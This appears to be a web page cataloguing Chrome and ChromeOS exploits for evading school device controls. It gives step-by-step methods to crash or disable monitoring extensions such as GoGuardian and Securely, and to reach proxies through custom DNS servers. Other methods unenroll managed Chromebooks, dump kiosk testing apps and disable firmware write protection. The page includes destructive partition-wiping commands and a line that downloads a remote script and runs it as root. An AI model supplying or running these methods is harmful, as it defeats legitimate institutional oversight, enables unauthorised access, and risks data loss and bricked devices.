

This page is for Google Chrome/Chrome OS bypasses
For Windows exploits, see Bypasser’s Windowskit
Most web-based exploits will work on other Chromium based browsers



Table of Contents
Alphabetic
App Diagnose Wi-Fi Bypass
BackAge
BadApple
BadRecovery
Baghdad
Blank3r
Blobe BM
BlobBypass
BlobWi-Fi
BR1CK
Browser Action Crasher
Buypass
ByeBlocker
Car Axle Client
CAUB
cauDNS
Chaos
Chriosk Dumping
Cookie Dough
Corkey
Crimson
CroshFi
Cryptosmite
DAUB
De-roll
Dextensify
Disable Manager
Downgration
E-Halcyon
Extension Launcher
ExtHang3r
ExtPrint3r
Fakemurk
Firmware Write Protection
Firmware2
GoGuardian GoAway
GuardianTabCrash
Hapara Focus Session Bypass
HSTS
Icarus Lite
Incognito Exploit
Ingot
INSECURELY
K1LL3R SP1D3R
Kernel Version Switcher
Killcurly
Locked Mode X
LoMoH
LTMEAT
Murkmod
NCOCrOS
OP Crosh
Point-Blank
Policy Password Tool
Pollen
Priism
Quickview
Revertion
Rigtools
Search Filter Bypass
Securely-Kill
Sidetracked
Sh0vel
SH1MMER
Shimboot
Sigill
Skebstore
SKIOVOX
Snap&Run
SOT
Source View
SWAB
Swamp Launcher
Sync Internals Password Extractor
Tr3nch
uBlock Run
uBoss
URL Unblocker
uRun
USBoot
Window of Opportunity




Any Web Proxy Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Alphabetic

proxy moment
Opens a proxy tab with about:blank cloaking.
Web-based exploit.


1: Make a bookmarklet with the link from xlak.github.io/alphabetic/ & run it.
2: Print the page (Ctrl+P), then cancel & click “try again”. A proxy tab will open.



Any OS Blocksi;GoGuardian;Hapara;iBoss;Securely App Diagnose Wi-Fi Bypass

Requires an app.
Chrome OS-based exploit.


1: Disable Wi-Fi.
2: Click "Sign in as Existing User".
3: Hold Esc & click any app.
4: Click "Add Wi-Fi" & click any Wi-Fi.
5: Click "Diagnose" & go to Wi-Fi.
6: Click "Open in Settings", then close it.
7: Repeat step 2.



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely ExtensionDevMode BackAge

Requires Extension Dev Mode
Freezes extensions.
Web-based exploit.


1: Go to chrome://extensions & enable Extension Dev Mode.
2: Click on the background page of the extension you want to block, then "Network", "Disable Cache", & "No Throttling".
3: Go to Settings & click on the "Disable javascript" box. Keep this tab open.
4: Disable "No Throttling".



Any OS Blocksi;GoGuardian;Hapara;iBoss;Securely DNSSettings Baghdad

Requires access to DNS settings
Browse web from the sign-in screen.
Chrome OS-based exploit.


1: Sign out & click the settings button located at the top right of the Wi-Fi panel.
2: Set "Name servers" to "Custom name servers".
3: Set the first Custom name servers to 150.136.163.0.
You'll see a link on the normal sign-in screen that says "Visit this network's sign-in page".
4: Click on "Webview link for tests".
5: Click "Diagnose" & go to Wi-Fi.



122 OS Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Browser Action Crasher

Patched on Chrome OS 123+
Crashes extensions.
OS-based exploit.


1: Pin the extension you want to disable, sign out, disable Wi-Fi, & log back in.
2: Quickly enable Wi-Fi, open Chrome, & spam the pinned extension for ~30 seconds.



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Buypass

Only lasts for 3 minutes.
Bypasses extensions for 3 minutes.
Web-based exploit.


1: Go to any of these links:



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely chrome://network cauDNS

Requires chrome://network#state
Disables extensions.
Web-based exploit.


1: Go here & follow the instructions there.



Any Web Hapara InspectElement Chaos

Requires Devtools.
Confuses 1 of 3 extensions, bypassing Hapara Highlights & Hapara Filter.
Web-based exploit.


1: Get the code from xlak.github.io/chaos/ & paste it in a new tab.
2: Inspect the page that loads.
3: Click on “Console” at the top & paste the script in.
4: When an inspect window pops up, paste the script in again.



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Cookie Dough

Requires bookmarklets
Creates a loop to screw over extensions.
Web-based exploit.


1: Run this bookmarklet on the blocked page of your extension.



Any OS Blocksi;GoGuardian;Hapara;iBoss;Securely Powerwash Corkey

Requires powerwash.
Your extensions get corrupted & don't work.
Chrome OS-based exploit.


1: Powerwash your Chromebook.
2: Log into your Chromebook & immediately turn off Wi-Fi, then perform an instant restart (refresh+power).
3: Log back in & look for an option to log in as an existing user.
4: Go to chrome://extensions & turn on Wi-Fi.
5: Wait for your school’s blocking extension to appear. As soon as it does, turn off Wi-Fi & restart quickly.
6: Log back in, go back to extensions, & wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked.



Any OS Blocksi;GoGuardian;Hapara;iBoss;Securely Powerwash Crimson

Doesn't work with a force install list; requires powerwash
Corrupts extensions.
OS-based exploit.


1: Powerwash your Chromebook.
2: Login & immediately disable Wi-Fi.
3: Go to chrome://settings/syncSetup/advanced & click "Customize Sync".
4: Turn off sync for Extensions & everything else.
5: Save changes & enable Wi-Fi.



134 Web Blocksi;GoGuardian;Hapara;iBoss;Securely chrome://extensions Dextensify

Memory leak unavoidable; patched on Chrome OS 135+
Disables extension with a memory leak.
Web-based exploit.


1: Go to chrome://extensions.
2: In a new tab, go to the settings page of the extension you want to disable.
3: In another tab, go here & click the “freeze extension button”.
4: Immediately switch back to chrome://extensions & spam the “allow access to file URLs” for a few seconds.
5: The extension is now disabled. You need to flip the switch a few times every couple of minutes, & you may need to reopen the Dextensify page every once in a while to prevent an unavoidable memory leak from crashing the system.



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Disable Manager

Requires bookmarklets, Task Manager
Stops extensions from working with Task Manager & a bookmarklet.
Web-based exploit.


1: Open Task Manager & click on your blocker, then end its task.
2: Run either this or this bookmarklet on the newly unblocked page.



134 Web Blocksi;GoGuardian;Hapara;iBoss;Securely ExtHang3r

Patched on Chrome OS 135+
Hangs extensions. Similar to Dextensify & LTMEAT Flood Method.
Web-based exploit.


1: Go here & follow the instructions.



134 Web ExtPrint3r

Patched on Chrome OS 135+
Allows toggling of forced extensions by printing iframes. Based off LTMEAT Print method.
Web-based exploit.


1: Open this link.
2: Look for your blocker on the list. If it isn't there, toggle "show all extensions" in the settings.
3: Click disable & follow the directions on the popup window. You'll need to do it very quickly.

If the extension switches back on, increase the iframe slider in the settings.



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely GoGuardian GoAway

GoGuardian exclusive.
Disables GoGuardian.
Web-based exploit.


1: Go here.
2: Reload the page.
3: If you are left on an error screen, go to chrome://restart.



Any Web GoGuardian Bookmarklets;TabLimit GuardianTabCrash

Requires tab limit.
Crashes the admin's ability to remove tabs, though they can still see your screen.
Web-based exploit.


1: Create a bookmarklet with this code.
2: Spam click the bookmarklet while holding Ctrl.
3: If you’re asked to close the page, click no & prevent the page from making additional dialogues.



Any Web Hapara;iBoss chrome://net-internals HSTS

Requires chrome://net-internals access.
Bypasses extensions that also use a Chrome app. Hapara & iBoss are known to work.
Web-based exploit.


1: Go to chrome://net-internals & click the "Domain Security Policy" tab.
2: Insert 127.0.0.1 in the "Add HSTS domain’s Domain" textbox, then click "Add".
3: Repeat step 2, but use "localhost" instead of 127.0.0.1.
4: Restart your computer.



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Hapara Focus Session Bypass

Requires data: links.
Bypasses Hapara's Focus Session.
Web-based exploit.


1: Create a bookmarklet with this code.
2: During a focus session, run the bookmarklet.



111 OS Blocksi;GoGuardian;Hapara;iBoss;Securely Killcurly

Patched on Chrome OS 112+
Chrome OS-based exploit.


1: Go to sign out.
2: Press the big blue button.
3: Restart your Chromebook.
4: Add your school account back.



Incognito Exploit
81 OS Blocksi;GoGuardian;Hapara;iBoss;Securely InspectElement Incognito 81

Patched on Chrome OS 82+
Allows you to enter Incognito mode.
Web-based exploit.


1: Enter your username & password, but don't sign in.
2: Press Alt+Shift+I & spam the "Privacy Policy" for ~30-60 seconds.
3: Login, quickly go to the Incognito tab, then press Ctrl+Shift+N.
4: Close the original Incognito tab.
5: If it continues to open policy pages, repeat Step 4.

127 OS Blocksi;GoGuardian;Hapara;iBoss;Securely chrome://flags Incognito 123-127

Patched on Chrome OS 127+
Allows you to enter Incognito mode.
Web-based exploit.


1: Enable the chrome://flags/#captive-portal-popup-window flag (v123-125)/chrome://flags/#temporary-unexpire-flags-m124 (v126)/chrome://flags/#temporary-unexpire-flags-m125 (v126-127) flag & restart. If the flag didn't reset, continue.
2: In Wi-Fi Settings, set Name Servers to Custom Name Servers & the first box to detectportal.firefox.com/captive.apple.com/150.136.163.0 (any one of these).
3: Click sign-in on the popup, then press Ctrl+T.
4: Revert the change to Name Servers.



105 Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Ingot

Patched on Chrome OS 106+
A menu to disable extensions & enable extension Dev Mode. The successor UI to LTBEEF.
Web-based exploit.


1: Make a bookmarklet with this code.
2: Go to https://chrome.google.com/webstorex & run the bookmarklet.

Any Web Securely INSECURELY

Patched on Securely versions above 2.98.55
A toggle that kills Securely using black magic.
Web-based exploit.


1: Go here & flip the switch.



110 Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets LoMoH

Doesn’t work with Hapara Highlights & Read&Write; patched on Chrome OS 111+
Uses locked mode to disable extensions. Formerly called Locked Mode Hack.
Web-based exploit.


1: Create a bookmarklet with this code & run it.



114 Web Blocksi;GoGuardian;Hapara;iBoss;Securely LTMEAT

Methods using (B) & (C) are patched on Chrome OS 115+ while the rest are patched on Chrome OS 135+
Crashes an extension's manifest file.
Web-based exploit.

Note: LTMEAT disables all extensions, not just your blocker.
Template URL: chrome-extension://ID/manifest.json
Extension IDs (Chrome):

If your blocker ID isn’t on this list, go to the extension page & copy the character string in the URL.


1: Take the Template URL & replace "ID" with the extension ID. This is the extension's manifest page.
2: Go to the extension’s manifest page & bookmark it (A), as well as chrome://kill (B) & chrome://hang (C).
3: While on (A), click on (B).
4: Instantly start spamming (C) & reload.

Web Blocksi;GoGuardian;Hapara;iBoss;Securely Switch Method

1: While on (A), click on (B).
2: Duplicate the tab.
3: Go to the extension’s settings page.
4: Flip the "Allow access to file URLs" switch.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Chat Method

1: Wait until your teacher opens the chat window.
2: Spam X until it stops opening.
3: Flip the “Allow access to file URLs” switch.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Temporary Method

1: Create a new bookmark folder (spam.js) & inside that folder, make 38 bookmarks of the page chrome-extension://id/background.js (you can do this easily with the bookmark manager).
2: Go to chrome://settings/performance & turn memory saver off. Under “Keep these sites always active”, add chrome-extension://id/background.js.
3: On a new tab, right click (spam.js) & click “open all (38)”. Repeat this step, then duplicate the rightmost page & go to your blocker’s extension page.
4: Flip the “Allow access to file URLs” switch & go to the leftmost tab. Right click it & select “Close tabs to the right”. Keep the remaining background.js tab open.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Skid Method

1: Go to (A) & click on (C).
2: Duplicate the tab (right click on it & click “duplicate”).
3: Go to your blocker’s extension page & flip the “Allow access to file URLs” switch.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Web Method

1: Go here & follow the instructions there.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Wi-Fi Method

1: Go to your blocker's extension page.
2: Disable Wi-Fi.
3: Spam the “Allow access to file URLs” switch.
4: Enable Wi-Fi.
5: Spam pin your extension.



Web Blocksi;GoGuardian;iBoss;Securely Bookmarklets Point-Blank

N/A
Allows you to execute scripts using extensions, as well as hard & soft disable extensions.
Web-based exploit.


1: Create a bookmarklet with the code from here.
2: Go to one of these pages:
3: Click on the blue link & run the bookmarklet in the newly opened tab.



114 Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Quickview

Requires bookmarklets; patched on Chrome OS 115+
Loads pages without extensions.
Web-based exploit.


1: Create a bookmarklet by dragging the box that says “Quickview Launcher” from here into the Bookmarks Bar.
2: On that same page, double click the opener.
3: On the newly opened tab, run the bookmarklet.



128 Web Blocksi;GoGuardian;Hapara;iBoss;Securely Rigtools

Patched on Chrome OS 129+
Allows you to do a ton of things (with the right permissions).
Web-based exploit.


1: Keep this website open in a new tab.
2: Open this website & go to Network.
3: Double-click the black/grey box.
4: Click "extension-ID" & find the extension ID of the extension you want to disable, then paste it in. It should load a filesystem: page. You can have other extensions under it.
5: Run this code. Note it won't work if your extension's manifest file doesn't have the proper permissions.



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Sidetracked

Requires flag access; only works on Chrome OS 106+
Uses the unblocked sidebar to browse the web.
Web-based exploit; Chrome OS exclusive.


1: Go to chrome://flags#search-web-in-side-panel & enable it, then restart.
2: Open the side panel & select “google.com” from the drop-down list.



Any Web; Blocksi;GoGuardian;Hapara;iBoss;Securely Sigill

Requires an extension with a textbox
Hangs extensions.
Web-based exploit.


1: Download the index.html & emoji files.
2: Insert the emoji file into the HTML file.
3: Click "Copy to Clipboard".
4: In a textbox from the extension you want to disable, do paste & after a second, do it again.
5: Immediately after, open a page related to the extension (such as the manifest file) & keep it open.



118 OS Blocksi;GoGuardian;Hapara;iBoss;Securely Kiosk SKIOVOX

Requires a kiosk app; Most methods patched on version 119
Opens a window inside of a kiosk app, which has different permissions & extensions.
Chrome OS-based exploit.


1: In the login screen, turn off your Wi-Fi.
2: If you have a password, type it in but don’t press enter.
3: Click on a kiosk app & press Alt+Shift+S instantly.
4: Wait until you get a “network unavailable screen”.
5: On the toolbar, click accessibility & then the ?.
If you see a “back” button proceed to method A (steps A-B), otherwise go to method B (steps C-E) or method C (steps F-H).

Method A:
A: Click “add other Wi-Fi network” & immediately press Esc twice & Enter. If you get a screen saying “multi sign-in is disabled”, press Esc to bypass it.
B: There may be an open window belonging to your school profile, you can close it. In the window behind it that has no extensions, click the 3 dots & then click “new window”. Use this window instead. Go to steps 14+.

Method B:
C: Press the “diagnose” button.
D: Just click “add other Wi-Fi network”. This is inconsistent, try a few times with a few apps or use steps 11-13.
E: Click Wi-Fi, then the settings link. Close this window to reveal a Chrome window. Go to steps 14+.

Method C:
F: Just click “add other Wi-Fi network”.
G: Turn on text-to-speech (Ctrl+Alt+Z). Hold the Search key & press O, then T.
H: Click “resources” & one of the 3 links to open Chrome. Once your browser is open, you can turn text to speech off. Go to steps 14+.
This exploit has some problems that can be fixed by the Skiovox Helper. A ZIP file of the extension is available on the GitHub page as well as here.
6: Go to chrome://extensions & enable extension Dev Mode. Click “load unpacked” & in the select a file menu, right click the ZIP file you downloaded earlier, & click “extract all”. Select the newly extracted folder to install the extension.


Other notes:
Problems without Skiovox Helper: The main difference between the results of method A (steps A-B) and those of method B (steps C-E) or method C (steps F-H) is that method A can open multiple windows, while the others can’t.
If your screen keeps falling asleep every 5 seconds, try a different kiosk app.
Your files, bookmarks, & history won’t transfer over to the exploit & vice versa.
To exit the exploit, either hold down your power button & sign out or type chrome://quit in a new tab.

OS Blocksi;GoGuardian;Hapara;iBoss;Securely Kiosk 125/126 Method

1: Do the main method's steps 1-4.
2: Click the cog in the brightness settings instead.
3: Click on one of the links in Chromevox's Resources tab (Ctrl+Alt+Z), then disable it.
4: Click "Sign in as existing user" & login. If you don't see this, try a different kiosk app.
5: Press Esc on the "Multi user sign in disabled on this Chromebook" screen.
6: Turn on Wi-Fi & open a new window.
7: Go to main method steps 6+.

Note that any Incognito window is still monitored by your school.



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely ExtensionAccess SOT

Requires extension access.
Uses OneTab & European witch magic to unblock websites.
Web-based exploit.


1: Download the OneTab extension.
2: Click the "import" button in the extension's settings tab.
3: Add the URL you wish to visit ~100 times, then click "import".
4: Spam click the top link, then either spam Esc on one of the opened tabs or wait for one to load on an about:blank page.



Any OS SWAB

Requires Name Servers.
I don't know man but it gets you an unblocked browser.
OS-based exploit.


1: Sign out & go to the Wi-Fi Settings.
2: Go to Name Servers & set it to "Custom Name Servers", then set at least 1 box to "52.207.185.90". If it doesn't automatically save, reconnect 1-3 times.
3: If you see a "Network not available" page, click "Sign in as an existing user" & then back until you reach the login screen.
4: Underneath there should be a "Sign in with Google account" button. Click it & then "Forgot Email?".
5: It should now show a 400 error page, click the Google logo.



Any OS;Proxy Blocksi;GoGuardian;Hapara;iBoss;Securely DNSSettings Swamp Launcher

Requires access to DNS settings
Connects you to a proxy server.
Chrome OS-based exploit.


1: Open the DNS settings.
2: Select "custom name servers" & set all of the boxes to 0.0.0.0.
3: Wait 5 seconds, then change them to 150.136.6.90.
4: In Google, go here.
5: Reload the page (Ctrl+Shift+R), then go here on the same tab.
6: Click on the big red triangle in the middle of the page & type "thisisunsafe". If you fail, reload the page & repeat this step.
7: Repeat step one & select "automatic name servers".



Any Web Blocksi;iBoss Bookmarklets uBoss

Exclusive to iBoss & Blocksi
Tampers with iBoss.
Web-based exploit.


1: Create a bookmarklet with this code.
2: Go to one of these URLs:
3: Run the code & follow the instructions.



Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely URL Unblocker

Requires editing to change website.
An unblocked alternative link.
Web-based exploit.


1: Take the URL of the site you want to visit & replace "URL" at the end of this.
2: Go to the URL.



Any Web; Blocksi;GoGuardian;Hapara;iBoss;Securely Window of Opportunity

Patched on Chrome OS 135+
Gives a very brief window of time where websites will be unblocked.
Web-based exploit.


1: Go to your blocker's extension & flip the "Allow Access to File URLS" switch. You will have a very short window to access websites.




Miscellaneous

132 OS;Unenrollment miniOS BadApple

Requires miniOS; patched on Chrome OS 133+
Chrome OS-based exploit.


1: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
2: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
3: When connected, press Ctrl+Alt+F3.

You now have a shell you can run things in.



124 OS;Unenrollment ExternalStorageDevice BadRecovery

Requires a storage device, another PC; patched on Chrome OS 125+ & kernver 4+ & keyrolled devices
Chrome OS-based exploit.


1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4+, your Chromebook is unsupported.
3: Download a bin from chrome100.dev.
4: Go here & upload it, then flash it.
5: Enter Recovery Mode (Esc+Refresh+Power). If you're using the unverified payload, you must also enter developer mode, & then enter recovery mode again. On Cr50 devices, you must NOT be in developer mode for unenrollment to work.
6: Insert the storage device.
Mode Operations:


Any Web Bookmarklets Blank3r

about:blank
Allows you to run bookmarklets on privileged pages.
Web-based exploit.


1: Make a bookmarklet with this code.
2: Go to chrome://extensions & click on an extension.
3: Click “view in Chrome Web Store” & spam escape. If it loads into a blank screen, run the bookmarklet.
4: Keep this tab open.

Any Web Blobe BM

Not compatible with every bookmarklet by design
Runs bookmarklets.
Web-based exploit.


1: Go here & follow the instructions.



Any Web BlobBypass

Requires BlobWi-Fi
Removes or bypasses blocking.
Web-based exploit.


1: Use BlobWi-Fi & go here.
Notes:



Any Web chrome://network BlobWi-Fi

Requires chrome://network
Removes network level blocking.
Web-based exploit.


1: Go to chrome://network#state.
2: Find the managed Wi-Fi under "Favorite Networks".
3: Click the "+" & copy all the text.
4: Go here & paste the text into the bar, then click "Download".
5: Go to chrome://network#general & import the ONC file.



131 OS;Unenrollment ExternalStorageDevice BR1CK

Certain boards are incompatible (see here); patched on Chrome OS 132+ & keyrolled devices
Unenrolls your Chromebook.
OS-based exploit.


1: Powerwash (Esc+Power+Refresh then Ctrl+D) & return to Secure Mode.
2: Go to chrome://network#logs & check all boxes under the options section.
3: Place the combined-logs.tar.gz file in here. If you don't have access, the time will be ~1-1.5 seconds less than the time it takes to enroll.
4: Sign out & powerwash again, but use Ctrl+Alt+Shift+R instead.
5: When the "Enterprise Enrollment" screen appears, wait until you're in the higher time range & perform an EC-Reset (Power+Refresh).
6: If you get a screen prompting you for recovery ("Chrome OS is missing or damaged" or "Something went wrong"), continue.
7: Perform SH1MMER (Legacy).

A: While you're here, disable the 5 minute Dev Mode wait.

8: Select Deprovision (D), then type "B" to open a bash shell.
9: Run this command: "gsctool -a -o" & press the power button when it spams "Press PP button now!".
10: Reenter Dev Mode, then when the "Enterprise Enrollment" screen shows up again enter Recovery Mode & boot into SH1MMER.
11: Run deprovision (D) & then reboot (E).



Any Web Bookmarklets Car Axle Client

Requires bookmarklets
A menu with games, exploits, & bookmarklets.
Web-based exploit.


1: Make a bookmark with the code from here & run it on any page.

This exploit was discovered by penguinify on GitHub.



127 Web chrome://network CAUB

Has to be done for each Wi-Fi network; patched on Chrome OS 128+
Prevents your Chromebook from automatically updating.
Web-based exploit.


1: Go to chrome://network#state & scroll to the bottom.
2: Click the "+" by the name of the Wi-Fi network.
3: Copy the whole page (Ctrl+A then Ctrl+C).
4: Go to caub.glitch.me & paste it into the text box.
5: Click "generate onc" & download the file.
6: Go to chrome://network#general & import the onc file.

127 Web chrome://network Flag Method

Requires chrome://flags access; patched on Chrome OS 128+
Chrome OS-based exploit.


1: Go to chrome://flags#show-metered-toggle & enable it.
2: Open Settings & go to Network >> Your Wi-Fi >> Advanced >> Show metered toggle & turn it on.



Any OS DevMode;ExternalStorageDevice Chriosk Dumping

Requires Crosh, Dev Mode
Dump any kiosk app & then make it a regular Chrome OS app.
Chrome OS-based exploit.


1: Enable Dev Mode, then add your home & then your school account.
2: Open Crosh (Ctrl+Alt+T) & run "shell", then go to "/home/chronos/{user account hash}/extentions/kiosk/" & find the ID of the kiosk app you want to dump.
TestNav: mdmkkicfmmkgmpkmkdikhlbggogpicma
SecureTestBrowser: hblfbmjdaalalhifaajnnodlkiloengc
NWEA: omkghcboodpimaoimdkmigofhjcpmpeb
CollegeBoard: joaneffahikmmipmidpkeedopejmhbbm
3: Back it up to your downloads folder by running "cp /home/chronos/{user account hash}/extentions/kiosk/(app ID) /home/chronos/{user account ID hash}/Downloads/".
4: Go into the folder & edit the "manifest.json" file. Delete the "kiosk_only": true line.
5: Load the folder with Extension Dev Mode in chrome://extensions (click "Load Unpacked").



119 OS;Unenrollment ExternalStorageDevice Cryptosmite

Requires a storage device, another PC; patched on kernver 3+ & keyrolled devices
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.


1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 3+, your Chromebook is unsupported.
3: Downgrade to 118. If you're on a version before 118, stay on it.
4: Download an injected RMA Shim from here or build your own.
5: Flash the injected RMA Shim onto a USB device.
6: Enter Dev Mode (Ctrl+D).
7: Reenter Recovery Mode & plug in the storage device.
8: Navigate to the Cryptosmite payload, press enter, then Y.



Any OS DAUB

Might not work
Prevents your Chromebook from automatically updating by deleting the update partitions. Also blocks kernver updates.
OS-based exploit.


1: Access a shell (via methods such as SH1MMER or BadApple).
2: Run the following (3rd will open a prompt):
cgpt add /dev/mmcblk0 -i 2 -P 10 -T 5 -S 1
yes | mkfs.ext4 /dev/mmcblk0p1
fdisk /dev/mmcblk0
d
4
{just press enter}
d
5
{just press enter}
w



Any OS ExtensionAccess;ExternalStorageDevice;RecoveryMode Downgration

Requires a storage device; extension access required; Mostly Limited
Downgrade your Chromebook.
Chrome OS-based exploit.


1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 0 or 1, your Chromebook can downgrade to any version. Otherwise, it's limited.

Minimum versions:
0/1: N/A
2: 112
3: 120
4: 125
5: 132
fwver 2 versions are 114+

3: Go to chrome://version & check your board (under platform).
4: Go to chrome100.dev & find your board (use Ctrl+F) or find the bins here.
5: Download the version of Chrome OS you want.
6: Install the Chromebook Recovery Utility extension & run it.
7: Plug in the storage device & follow the instructions.
8: On your Chromebook, enter Recovery Mode (Esc+Reload+Power) & follow the prompts.
9: Skip the "Checking for Updates" screen by pressing Ctrl+Shift+E.



129 OS;Unenrollment ExternalStorageDevice;RecoveryMode E-Halcyon

Requires a storage device; patched on Chrome OS 130+ & keyrolled devices
Boots into an unenrolled Chrome OS environment.
Chrome OS-based exploit.


1: Download a Chrome OS 107 bin from chrome100.dev & inject it yourself or download one from here.

A: Open a terminal & run "git clone https://github.com/MercuryWorkshop/RecoMod", "cd RecoMod", "chmod +x recomod.sh", & "sudo ./recomod.sh -i /path/to/recovery/image.bin --halcyon --rw_legacy".

2: Flash it onto a storage device.
3: Enter Recovery Mode (Esc+Refresh+Power) & plug in the storage device.
4: Spam E until you get a 5 minute wait sequence, then spam E again near the end of it.
5: Navigate to "activate halcyon environment" & press enter, then navigate to "install halcyon semi-tethered". Navigate back to "activate halcyon environment" & select "Boot halcyon semi-tethered".

You can no longer boot Chrome OS normally, & will have to use the storage device every time.



Any Web Bookmarklets Extension Launcher

Doesn’t work with blocklist/banlist
Installs an extension without using the webstore.
Web-based exploit.


1: Make a bookmarklet with the code from here.
2: Go here & run the bookmarklet.
3: Find an extension you want to download.
4: Right-click the image to the left of the title & select "Copy image address". Paste the image address into the first bar.
5: Type the name of the extension into the second bar.
6: Copy the extension ID (string of random letters in the address bar). Paste it into the third bar.
7: Click "Download".

Visit the Extension Information page for information on some extensions.



Any Hardware Firmware Write Protection

Disabling FWWP allows you to do many things, including flashing custom firmware (allowing for installation of Linux, Windows, etc.) & setting GBB flags.

The method to disable FWWP depends on your Chromebook; however, if you've been on v114 or above, you must use the Pencil method.

History of FWWP:
PreCr50: these old boards used either a screw, a jumper, or a switch on the motherboard & are some of the simplest out there. If you happen to be lucky enough, I recommend trying this.
Cr50: following this, a new chip was added known as the Cr50. Older Cr50 Chromebooks set FWWP to the battery sense line, while later ones require everybody's favorite Pencil method. You can also use Closed Case Debugging/SuzyQable on all of these, as long as you're unenrolled.
Ti50: the generation 2 Cr50 chip, better known as the Ti50, now verifies the RO portion of the firmware at boot, meaning you need to run a few commands to prevent bricking. Regardless of whether a Ti50 device supports another method, you must use CCD/SuzyQable (unenrolled) or Pencil Sharpener (patched on v136).

Any Hardware Screwdriver Screw

Requires screwdriver; possibly patched on firmware 2+

1: Turn your Chromebook off & unscrew the back cover.
2: Locate & unscrew the WP screw.
3: Screw the back cover back on.

Any Hardware Screwdriver Jumper

Requires screwdriver, bridger; possibly patched on firmware 2+

1: Turn your Chromebook off & unscrew the back cover.
2: Disconnect the internal battery cover.
3: Locate & bridge the area for the WP jumper.
4: Reassemble the device.

Any Hardware Screwdriver Battery

Requires screwdriver; possibly patched on firmware 2+

1: Turn your Chromebook off & unscrew the back cover.
2: Unplug the power cord connecting the battery & motherboard.
3: Run the necessary commands. If you're on v136+ you should probably change the device secret.

Save device secret: vpd -i RO_VPD -l
Change device secret: vpd -i RO_VPD -s stable_device_secret_DO_NOT_SHARE=device_secret

4: Plug the power cord back in & screw the back cover on (or just leave it off you fucking psycho).

Any Hardware Screwdriver Pencil

Requires Cr50, screwdriver, bridger, external storage device

1: oh fuck no not yet
save device secret: vpd -i RO_VPD -l
change device secret: vpd -i RO_VPD -s stable_device_secret_DO_NOT_SHARE=$(openssl rand -hex 32)

Any Hardware Debug Cable Closed Case Debugging/SuzyQable

Requires Dev Mode, debug cable; doesn't work with active FWMP

1: Enter Dev Mode, then open the VT2 Shell (Ctrl+Alt+F2 on login screen).
2: Login as root & run "gsctool -a -o".
3: You will be prompted to press the physical presence (PP) button multiple times; on most devices this is the power button.
4: Upon completion, you will see the message "PP Done!" confirming CCD enabling. Return to Dev Mode & the VT2 shell.
5: Login as root again, plug in the debug cable & run "ls /dev/ttyUSB*"; this should return with ttyUSB0, ttyUSB1, & ttyUSB2 if the cable is correctly connected.
6: Run "echo "wp false" > /dev/ttyUSB0" & "echo "wp false atboot" > /dev/ttyUSB0" to disable WP, then run "echo "ccd reset factory" > /dev/ttyUSB0", which allows you to unbrick the device with CCD & also is required for Ti50 computers.
7: Run "gsctool -a -I" to verify the CCD is opened & factory values are set; it should all be currently set to "Y/Always".
8: Run "crossystem wpsw_cur" & verify it returns 0, then reboot.

Unbricking Ti50s: hold the power button, on Chromebooks press F2 twice or on Chromeboxes press the recovery pinhole instead, then release the power button & repeat.

GBB flags

Requires disabled FWWP

These allow you to edit certain things, such as the Dev Mode wait timer, disable FWMP (unenroll), force enable certain things such as USB booting, & more.
1: Go to the GBB Flaginator to easily select the flags to set.
2: Run "futility gbb -s --flash --flags=0x120b7" on newer devices & "/usr/share/vboot/bin/set_gbb_flags.sh 0x120b7" on older ones to set flags. You can read them with "futility gbb -g --flash --flags"/"/usr/share/vboot/bin/get_gbb_flags.sh" respectively.


Any OS Dev Mode;dFWWP Firmware2

Requires Dev Mode, FWWP disabled
Dekeyrolls your device. Not the same as firmware 2, the updated version of Chromebook firmware included in v114+.
Chrome OS-based exploit.


1: Enter the VT2 shell (Ctrl+Alt+F2), then sign in as chronos & run "curl -LO https://raw.githubusercontent.com/Cruzy22k/Firmware2/main/firmware.sh && sudo bash firmware.sh".


125-129 OS;Unenrollment ExternalPC;ExternalStorageDevice;Powerwash;RecoveryMode Icarus Lite

Requires a storage device, another PC; requires Chrome OS 125-129
Unenrolls devices with device management interception using a proxy & a custom Certificate Authority.
Both devices should be on the same Wi-Fi network.
DO NOT USE PUBLIC ICARUS PROXIES.
Chrome OS-based exploit.

1: On an external PC, clone the repo with "git clone --recursive https://github.com/cosmicdevv/Icarus-Lite.git" & change directory to it (cd Icarus-Lite).
2: Set up the environment. You can either run the following commands or the exe.

Install dependencies: "pip install -r requirements.txt"/"pip3 install -r requirements.txt"/"sudo apt install python3-protobuf python3-requests python3-openssl python3-cryptography"
Run server: "python main.py"/"python3 main.py"

Nonkeyrolled:
A: Check your Chromebook's board in chrome://version, then download a prebuilt SH1MMER bin (with the Icarus payload) here.
B: Flash it to an external storage device, enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked), then boot the shim.

Keyrolled:
A: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
